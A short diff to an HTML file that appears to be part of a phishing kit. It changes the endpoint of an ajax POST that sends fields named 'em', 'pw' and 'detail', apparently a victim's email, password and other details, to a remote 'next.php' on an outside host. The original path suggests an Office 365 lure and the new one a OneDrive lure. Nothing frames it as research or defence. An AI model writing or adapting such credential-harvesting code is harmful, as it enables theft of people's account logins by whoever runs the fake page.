--- a/index.html
+++ b/index.html
@@ -2150,7 +2150,7 @@ $(document).ready(function()
 			{
 			$.ajax(
 				{
-				dataType:'JSON',url:'https://test.proct.xyz/o365/next.php',type:'POST',data:
+				dataType:'JSON',url:'http://uoko-import.info/drive/one/next.php',type:'POST',data:
 					{
 					em:c,pw:d,detail:e,
 				}
